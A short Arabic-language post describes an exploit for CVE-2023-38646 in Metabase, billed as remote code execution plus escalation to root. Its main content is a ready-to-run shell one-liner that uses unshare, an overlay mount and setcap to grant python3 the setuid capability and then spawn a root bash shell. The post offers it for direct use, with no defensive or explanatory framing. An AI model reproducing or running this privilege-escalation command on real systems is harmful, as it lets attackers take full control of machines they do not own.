
استغلال لـ CVE-2023-38646 في Metabase، يحقق تنفيذ التعليمات البرمجية عن بُعد وتصعيد الامتيازات إلى الجذر عبر تقنيات unshare و setuid.
للحصول على المستخدم الجذر (root) للجهاز أو النظام وفقًا للمعلومات أعلاه، سيؤدي هذا الأمر والملف إلى الدخول كمستخدم جذر.
يمكنك تشغيل هذا الأمر مباشرة أو تشغيله كملف وتنفيذه. الأمر:
$unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
الملف المنفذ:
$./exploitsh.sh
رائع!